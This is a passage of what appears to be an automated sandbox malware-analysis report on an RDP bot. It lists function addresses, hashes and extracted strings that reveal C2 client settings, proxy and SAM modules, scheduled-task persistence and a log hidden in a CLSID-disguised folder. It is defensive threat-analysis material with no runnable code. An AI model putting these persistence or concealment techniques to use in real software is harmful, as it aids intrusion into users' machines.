                                                                                                                                                  • Instruction Fuzzy Hash: 94414962F086C7A6FA528F58E9417F82351AF007C8F458536DB4D1A596DF3DF986E300
                                                                                                                                                  Function 00007FF8BFB58409 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 90stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158612916.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158658328.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158682587.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158717664.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158748673.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158773276.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strcmp
                                                                                                                                                  • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec$main$version
                                                                                                                                                  • API String ID: 1004003707-693788558
                                                                                                                                                  • Opcode ID: 0b5434fd82731331c32f89b55454895718f2443e3b4546f6be8949ec3718175f
                                                                                                                                                  • Instruction ID: 742dd8ba5f68486097fb4edf1a5f10ad994634536fe86cb358ed1482fa22ede2
                                                                                                                                                  • Opcode Fuzzy Hash: 0b5434fd82731331c32f89b55454895718f2443e3b4546f6be8949ec3718175f
                                                                                                                                                  • Instruction Fuzzy Hash: 0F412A61A09687A1FA209FD9F960BB8B360BF507C9F445136EB4D0A595DF3CFA96C300
                                                                                                                                                  Function 00007FF8BFB8C3C9 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 90stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strcmp
                                                                                                                                                  • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$cnccli$ini_get_sec$server_host
                                                                                                                                                  • API String ID: 1004003707-1509792781
                                                                                                                                                  • Opcode ID: cec21c9f73427ec2da6491224bd564f2f11f16dbc1f39dfadc49aebaa499689f
                                                                                                                                                  • Instruction ID: 660eefcef5034ac8e8b39a72640d4d9cc1f1a02ce92b75d51c5e348403d12047
                                                                                                                                                  • Opcode Fuzzy Hash: cec21c9f73427ec2da6491224bd564f2f11f16dbc1f39dfadc49aebaa499689f
                                                                                                                                                  • Instruction Fuzzy Hash: 2541EBE2A0964795FA209FD8E8417F46350AF843D8F888536DB4D5B5E6DF3DE58AC300
                                                                                                                                                  Function 00007FF8BA4F1AAE Relevance: 18.1, APIs: 4, Strings: 8, Instructions: 79memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                                                                                                                                                  • String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                                                                                                                                                  • API String ID: 285244410-3859226547
                                                                                                                                                  • Opcode ID: 95db56508a070af681d481542748a3197114f80687e374468034128ed152e278
                                                                                                                                                  • Instruction ID: d1e1bf473ad42f13a60970cf3596134e9d292aa8526f5a38730b1033be34f1f9
                                                                                                                                                  • Opcode Fuzzy Hash: 95db56508a070af681d481542748a3197114f80687e374468034128ed152e278
                                                                                                                                                  • Instruction Fuzzy Hash: 3931FA60A0D603D1FA219B9DEC903B52351AF46BD5F44A0B6CF0D572B4EE2EAA49C300
                                                                                                                                                  Function 00007FF8B9151AAE Relevance: 18.1, APIs: 4, Strings: 8, Instructions: 79memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                                                                                                                                                  • String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                                                                                                                                                  • API String ID: 285244410-3859226547
                                                                                                                                                  • Opcode ID: 27a32a85cc346afb59106e55f512f4edb1a767274d0ae344b874c7e539677345
                                                                                                                                                  • Instruction ID: 799effd68652332ccc69ce4f3674460035339f01548c6f7b314710808e2707e1
                                                                                                                                                  • Opcode Fuzzy Hash: 27a32a85cc346afb59106e55f512f4edb1a767274d0ae344b874c7e539677345
                                                                                                                                                  • Instruction Fuzzy Hash: D1311764E09A9385FA129F1DE8603B52361AF44BC4F9AC435DB4D1B2A4EF6CF985F300
                                                                                                                                                  Function 00007FF8B918F18E Relevance: 18.1, APIs: 4, Strings: 8, Instructions: 79memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                                                                                                                                                  • String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                                                                                                                                                  • API String ID: 285244410-3859226547
                                                                                                                                                  • Opcode ID: 927ebebcac4c7bf28bae6e4b1e331234b1c0fbf7e3075d44c0c1b5d0e5bf19a7
                                                                                                                                                  • Instruction ID: ad2bfea5774450aa2002049a40baa09234ccdd700e424db7ae88bcff5981aac5
                                                                                                                                                  • Opcode Fuzzy Hash: 927ebebcac4c7bf28bae6e4b1e331234b1c0fbf7e3075d44c0c1b5d0e5bf19a7
                                                                                                                                                  • Instruction Fuzzy Hash: D5314169E0DA8781FA549F4CE8807746352AF45BD4FA98031DB0D473A5EF2CE946F390
                                                                                                                                                  Function 00007FF8BFB538AE Relevance: 18.1, APIs: 4, Strings: 8, Instructions: 79memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158612916.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158658328.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158682587.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158717664.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158748673.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158773276.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                                                                                                                                                  • String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                                                                                                                                                  • API String ID: 285244410-3859226547
                                                                                                                                                  • Opcode ID: 4940b5da95d0ae020ec3bfee3c5667328d6dcc69be74491bcb0805f1be78f140
                                                                                                                                                  • Instruction ID: 6af90cc4b8b3021cbfa118ed8a0c5d89c4f2d72fedbe9bc540b588d1d096dc21
                                                                                                                                                  • Opcode Fuzzy Hash: 4940b5da95d0ae020ec3bfee3c5667328d6dcc69be74491bcb0805f1be78f140
                                                                                                                                                  • Instruction Fuzzy Hash: 56310CA2E09607A1FE519BDDE8603B97362AF44BC4F588435DA4E1B7A1EE3CF8558340
                                                                                                                                                  Function 00007FF8BFB89D6E Relevance: 18.1, APIs: 4, Strings: 8, Instructions: 79memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                                                                                                                                                  • String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                                                                                                                                                  • API String ID: 285244410-3859226547
                                                                                                                                                  • Opcode ID: 355508e66cb6e762a7e8849211fc4bc2e8f7dfbd30af042564a4fb98cc735545
                                                                                                                                                  • Instruction ID: 5b66072a1bff8190818ed39ff715ad96b81ae6efc3ba16493f5d8e0044077d6f
                                                                                                                                                  • Opcode Fuzzy Hash: 355508e66cb6e762a7e8849211fc4bc2e8f7dfbd30af042564a4fb98cc735545
                                                                                                                                                  • Instruction Fuzzy Hash: 1E310E61F0961791FE109F8DE8407B52791AF84FC5F989535CB4E473A6EE2CA945C340
                                                                                                                                                  Function 00007FF8B918785C Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 78COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CountCriticalErrorInitializeLastSectionSpinfflushfwrite
                                                                                                                                                  • String ID: $Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_proxies) failed(gle=%lu)$[I] (%s) -> %s$proxy_init$~
                                                                                                                                                  • API String ID: 3179112426-3318474754
                                                                                                                                                  • Opcode ID: 3bf602e0163212c75ed81c57b8ccc5374dcd8ffabe5220b955216cce5e13afa9
                                                                                                                                                  • Instruction ID: 86d01740d5396e5df4845fb854c92d21b9e2246347f93b25eb4ff050f73164ba
                                                                                                                                                  • Opcode Fuzzy Hash: 3bf602e0163212c75ed81c57b8ccc5374dcd8ffabe5220b955216cce5e13afa9
                                                                                                                                                  • Instruction Fuzzy Hash: 8331D650E1C68382FB215F5CA4C03B86294AF063E4F664932C75E462B3DE5DBD85B322
                                                                                                                                                  Function 00007FF8B9155A84 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 77COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CountCriticalErrorInitializeLastSectionSpinfflushfwrite
                                                                                                                                                  • String ID: $Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_sam) failed(gle=%lu)$[I] (%s) -> %s$sam_init$~
                                                                                                                                                  • API String ID: 3179112426-2019511216
                                                                                                                                                  • Opcode ID: bc9b366e1df2dffc722dcc5d192f50d0005bfb0d33aee01d23c5aa0be7fbb622
                                                                                                                                                  • Instruction ID: 314d58a39b00f78a14d885fedfcd0eb8c61d4e20236455cca1c6c31ad79b8b6f
                                                                                                                                                  • Opcode Fuzzy Hash: bc9b366e1df2dffc722dcc5d192f50d0005bfb0d33aee01d23c5aa0be7fbb622
                                                                                                                                                  • Instruction Fuzzy Hash: 1F31E960E0C78782FB215F1CA4D83BD22629F043C4FA65536D70E462A1DE7EB985F751
                                                                                                                                                  Function 00007FF8BA4FA060 Relevance: 16.6, APIs: 9, Strings: 2, Instructions: 145stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$strcpy
                                                                                                                                                  • String ID: *$schtasks
                                                                                                                                                  • API String ID: 2790333442-2394224502
                                                                                                                                                  • Opcode ID: 49773f8b016588153e9639c0d4cdf904ddd36bceb3f1ef689c3b893e88a01043
                                                                                                                                                  • Instruction ID: f017f95ccd4d3db41075cf4927f4eaf6275528c8b95376693cd10ad4b39e639a
                                                                                                                                                  • Opcode Fuzzy Hash: 49773f8b016588153e9639c0d4cdf904ddd36bceb3f1ef689c3b893e88a01043
                                                                                                                                                  • Instruction Fuzzy Hash: EF512722B4C68385FB619B5DA8953BD5351AB853C0F4920B5EF8E473D6DE3ED9088701
                                                                                                                                                  Function 00007FF8BFB3660A Relevance: 16.6, APIs: 7, Strings: 4, Instructions: 104memorysleepCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalHeapSectionmemcpy$AllocEnterLeaveProcessSleepfflushfwriterecv
                                                                                                                                                  • String ID: [D] (%s) -> Got an event(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$routine_rx
                                                                                                                                                  • API String ID: 3537583691-1494920791
                                                                                                                                                  • Opcode ID: d542514265604fe80ee2d18cc6880337692ea211fc3233fba6a32265b22876f4
                                                                                                                                                  • Instruction ID: ce6187fb85f68c21e816d0cc6951bf6f5c68bbff2cc0ac4a4235a3db22c9c354
                                                                                                                                                  • Opcode Fuzzy Hash: d542514265604fe80ee2d18cc6880337692ea211fc3233fba6a32265b22876f4
                                                                                                                                                  • Instruction Fuzzy Hash: CD416AA2A88B0282EB109F99E954BBA67A1FB44BD8F544039DF4D43795EF3CE445C700
                                                                                                                                                  Function 00007FF6BE0399E2 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 91fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                                                                                                                  • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log$service
                                                                                                                                                  • API String ID: 513531256-4171087551
                                                                                                                                                  • Opcode ID: 63c08d7458072f3ffe3d65f4f93f73f9d412e0c73241e0ce27064e40afdb8958
                                                                                                                                                  • Instruction ID: bb73815186f71b9baed8242903b752a685fb37a2572d84d447c546ba9e1dfe19
                                                                                                                                                  • Opcode Fuzzy Hash: 63c08d7458072f3ffe3d65f4f93f73f9d412e0c73241e0ce27064e40afdb8958
                                                                                                                                                  • Instruction Fuzzy Hash: 3E417C21A0C64586F330AB1DE9517AA3271FBB8780F840532FB0DD7695DF3CE5A19750
                                                                                                                                                  Function 00007FF8BA4F7AB4 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$_strtoui64
                                                                                                                                                  • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                                                                                                                  • API String ID: 3513630032-2069802722
                                                                                                                                                  • Opcode ID: b301655ed76bfcb65bf27385b654fd88f5a2592561199eef133ef872ace53a75
                                                                                                                                                  • Instruction ID: 637a793ed10bb829f66824e0b7fb96af2e2c78032790d21f10a8faee43fbf2e7
                                                                                                                                                  • Opcode Fuzzy Hash: b301655ed76bfcb65bf27385b654fd88f5a2592561199eef133ef872ace53a75
                                                                                                                                                  • Instruction Fuzzy Hash: 32218D22A08A43C6E6219F59FC807AA7364FB457C8F444072EF4C47664DF7DEA49C700
                                                                                                                                                  Function 00007FF8B915C974 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
